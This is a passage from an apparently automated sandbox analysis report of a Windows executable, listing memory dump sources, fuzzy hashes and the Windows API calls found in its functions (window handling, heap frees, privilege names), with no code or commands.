                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                    • Instruction ID: 0e71baa4b98d31938451221d1f045e8a8be1f53dc6e5eb7497dead484dbbf9dc
                                                                                    • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                    • Instruction Fuzzy Hash: CD9143B030034A8BEB25EE68D894BFE77D5EBA0304F54092DEAD6C72C5DB789585C351
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                    • Instruction ID: 17ebbe5ab46b511d7d505b565235103b9e696ffff0de12b763c1e5597a2c27b6
                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                    • Instruction Fuzzy Hash: 1E815C713443468BEB25DE68C8D0BFD77D4AB94308F04092DEAC6CB69ADF7885858752
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 64c6c010835b2e237667a447b11e2f87ae8f8ab2989e7b45553c4c40e93a0b13
                                                                                    • Instruction ID: 2a4a1d2b4c88d1a333736881aae1f1735f2a194d99cc3c33aeb41a62722d7bb2
                                                                                    • Opcode Fuzzy Hash: 64c6c010835b2e237667a447b11e2f87ae8f8ab2989e7b45553c4c40e93a0b13
                                                                                    • Instruction Fuzzy Hash: 0561A83160073966EBB89A6C6C947FE63D4EB13210F04959AFAC3DF2C1D691D84A861D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                    • Instruction ID: 340b8eb8a6e8c06bbba6cc4c00c2b3dd21337ad6c37c58b72ddc8bd1a5eedc0b
                                                                                    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                    • Instruction Fuzzy Hash: 26518860300B3557EFB9456C8C99FFF2BC99B52200F58089AEBC3CB692D609E545C39E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 60a80ef402ff4950a71dba13457ceaa2be071315d8b5682f293dee39f5eba645
                                                                                    • Instruction ID: 287d4bb29ec43ab5b54c119976bc638c3fb83d547fa010fd75acc0070a46dedc
                                                                                    • Opcode Fuzzy Hash: 60a80ef402ff4950a71dba13457ceaa2be071315d8b5682f293dee39f5eba645
                                                                                    • Instruction Fuzzy Hash: C851C4315093964FE723CF28C5844EEBFE0AE9A614F490999F4D95B283C221D68ADB52
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4881ea7f0f8c1c116e95e3405e1918a212335350a46169fc05905e0aece857ae
                                                                                    • Instruction ID: 304fd4cdbcefe9943b6cee2b0913a5a491fa50279448c3f6362cff1b06abbfaf
                                                                                    • Opcode Fuzzy Hash: 4881ea7f0f8c1c116e95e3405e1918a212335350a46169fc05905e0aece857ae
                                                                                    • Instruction Fuzzy Hash: BB51DEB1A087159FC748CF19D48055AF7E1FB88324F058A2EF899E3340D735E999CB9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                    • Instruction ID: b87aa642bf52f93208661ed39b590bc995cefb1abea06ad5cf7fd95ba50059f3
                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                    • Instruction Fuzzy Hash: 2831E4B17147468FDB55DF28C8502AABBE0FB95314F44452DE4C5DB341CB38E90ACB91
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0100E30E
                                                                                      • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                                                      • Part of subcall function 01011DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01041030,00000200,0100D928,00000000,?,00000050,01041030), ref: 01011DC4
                                                                                    • _strlen.LIBCMT ref: 0100E32F
                                                                                    • SetDlgItemTextW.USER32(?,0103E274,?), ref: 0100E38F
                                                                                    • GetWindowRect.USER32(?,?), ref: 0100E3C9
                                                                                    • GetClientRect.USER32(?,?), ref: 0100E3D5
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0100E475
                                                                                    • GetWindowRect.USER32(?,?), ref: 0100E4A2
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0100E4DB
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0100E4E3
                                                                                    • GetWindow.USER32(?,00000005), ref: 0100E4EE
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0100E51B
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0100E58D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                    • String ID: $%s:$CAPTION$d
                                                                                    • API String ID: 2407758923-2512411981
                                                                                    • Opcode ID: 5e9b1f5948d5ede331eca1620290bc120bc7f421ca398b697d1f1cd94713650f
                                                                                    • Instruction ID: 77572dba87375e63bc7a4dfe3971a20d318bad5496172d233b9976a4215ce5b3
                                                                                    • Opcode Fuzzy Hash: 5e9b1f5948d5ede331eca1620290bc120bc7f421ca398b697d1f1cd94713650f
                                                                                    • Instruction Fuzzy Hash: C8819371504301AFE711DFA8CD88A6BBBE9FBC8714F04491DFAC4AB291D675E8058B52
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 0102CB66
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C71E
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C730
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C742
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C754
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C766
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C778
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C78A
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C79C
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7AE
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7C0
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7D2
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7E4
                                                                                      • Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7F6
                                                                                    • _free.LIBCMT ref: 0102CB5B
                                                                                      • Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
                                                                                      • Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4
                                                                                    • _free.LIBCMT ref: 0102CB7D
                                                                                    • _free.LIBCMT ref: 0102CB92
                                                                                    • _free.LIBCMT ref: 0102CB9D
                                                                                    • _free.LIBCMT ref: 0102CBBF
                                                                                    • _free.LIBCMT ref: 0102CBD2
                                                                                    • _free.LIBCMT ref: 0102CBE0
                                                                                    • _free.LIBCMT ref: 0102CBEB
                                                                                    • _free.LIBCMT ref: 0102CC23
                                                                                    • _free.LIBCMT ref: 0102CC2A
                                                                                    • _free.LIBCMT ref: 0102CC47
                                                                                    • _free.LIBCMT ref: 0102CC5F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: 9ad5ac4629ba0624ddac6e5df04943e9ff02073a2ce0fe188b310cae6791bea8
                                                                                    • Instruction ID: 92a1fe252f5fb22641233d3ea0ec513d1b79043f541a32e0cbcd75d5f46099e7
                                                                                    • Opcode Fuzzy Hash: 9ad5ac4629ba0624ddac6e5df04943e9ff02073a2ce0fe188b310cae6791bea8
                                                                                    • Instruction Fuzzy Hash: F7315C316003269FFB62AA3DDA44B9A77E9AF10210F2088AAE5C8D7161DF31E844DB10
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 01019736
                                                                                    • _wcslen.LIBCMT ref: 010197D6
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 010197E5
                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 01019806
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0101982D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                    • API String ID: 1777411235-4209811716
                                                                                    • Opcode ID: e0efe7301e4b73f9d288078a90531bf66969b580ce9f42389b7ff44089e771e0
                                                                                    • Instruction ID: 1e808a2ef87b8351e980c866ebd2a9022a9b0e351365c36056730496eca19ff7
                                                                                    • Opcode Fuzzy Hash: e0efe7301e4b73f9d288078a90531bf66969b580ce9f42389b7ff44089e771e0
                                                                                    • Instruction Fuzzy Hash: 4B316A32504312BAE725AF349C45FAF7B9CEFA5314F14011DF9C19A1C5EB6CD90983A6
                                                                                    APIs
                                                                                    • GetWindow.USER32(?,00000005), ref: 0101D6C1
                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0101D6ED
                                                                                      • Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0101D709
                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0101D720
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0101D734
                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0101D75D
                                                                                    • DeleteObject.GDI32(00000000), ref: 0101D764
                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0101D76D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                    • String ID: STATIC
                                                                                    • API String ID: 3820355801-1882779555
                                                                                    • Opcode ID: 7b211ac1ec016f48996b362fb73a61cf88782a7a2351b924daa4c47dd72f0b4b
                                                                                    • Instruction ID: 25dfd916c8ba7c0ab13d058deccb356f20d20d70cb3819897a4b6106aaf2844e
                                                                                    • Opcode Fuzzy Hash: 7b211ac1ec016f48996b362fb73a61cf88782a7a2351b924daa4c47dd72f0b4b
                                                                                    • Instruction Fuzzy Hash: B8112432601791BBF2316AB49C4DFAF7AACBF54711F004510FAC5AA09DEB6DCA0947E4
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 01029705
                                                                                      • Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
                                                                                      • Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4
                                                                                    • _free.LIBCMT ref: 01029711
                                                                                    • _free.LIBCMT ref: 0102971C
                                                                                    • _free.LIBCMT ref: 01029727
                                                                                    • _free.LIBCMT ref: 01029732
                                                                                    • _free.LIBCMT ref: 0102973D
                                                                                    • _free.LIBCMT ref: 01029748
                                                                                    • _free.LIBCMT ref: 01029753
                                                                                    • _free.LIBCMT ref: 0102975E
                                                                                    • _free.LIBCMT ref: 0102976C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: c43e232320fa49392d8cc6717b0b964e5f0fa1288f34522141f2b73dbaf3b9d3
                                                                                    • Instruction ID: a807f113391efa2cf6189ab72bf95ccdf6b102d967594a14376634fc56722bdd
                                                                                    • Opcode Fuzzy Hash: c43e232320fa49392d8cc6717b0b964e5f0fa1288f34522141f2b73dbaf3b9d3
                                                                                    • Instruction Fuzzy Hash: 5111B67A51012ABFDB01FF54C840CDD3BB5EF24250B5199A2FA488F231DA32DA54DB84
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 322700389-393685449
                                                                                    • Opcode ID: 37ff6d6e9d14b98615f68c4780c8c35fd2040b24c6d3f7f7802e83d4d219e026
                                                                                    • Instruction ID: 3009a68ba0c10372f4f5e81e888928a06bdf6dfffadf82987a72d16c11bf00eb
                                                                                    • Opcode Fuzzy Hash: 37ff6d6e9d14b98615f68c4780c8c35fd2040b24c6d3f7f7802e83d4d219e026
                                                                                    • Instruction Fuzzy Hash: 12B19F3180022ADFCF65DFA8C8809AEBBB5FF18310F1441A9E9816F216D739DA51CF91
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 01006FAA
                                                                                    • _wcslen.LIBCMT ref: 01007013
                                                                                    • _wcslen.LIBCMT ref: 01007084
                                                                                      • Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
                                                                                      • Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
                                                                                      • Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                    • API String ID: 3122303884-3508440684
                                                                                    • Opcode ID: 213f1ec5c353957f1e24182f162d206d5cf168ed8176241598e85ff1c26ad575
                                                                                    • Instruction ID: ca10db17fc503464c14c077f19f12ba8a28207a9924c6d18ed898d4d9aa9e784
                                                                                    • Opcode Fuzzy Hash: 213f1ec5c353957f1e24182f162d206d5cf168ed8176241598e85ff1c26ad575
                                                                                    • Instruction Fuzzy Hash: 7B41C0B1E04745AAFB22E7789C81FEE77ACAF54300F004495FAC5A71C1D679B6888660
                                                                                    APIs
                                                                                      • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                                                      • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0101B610
                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0101B637
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0101B650
                                                                                    • SetWindowTextW.USER32(?,?), ref: 0101B661
                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0101B66A
                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0101B67E
                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0101B694
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
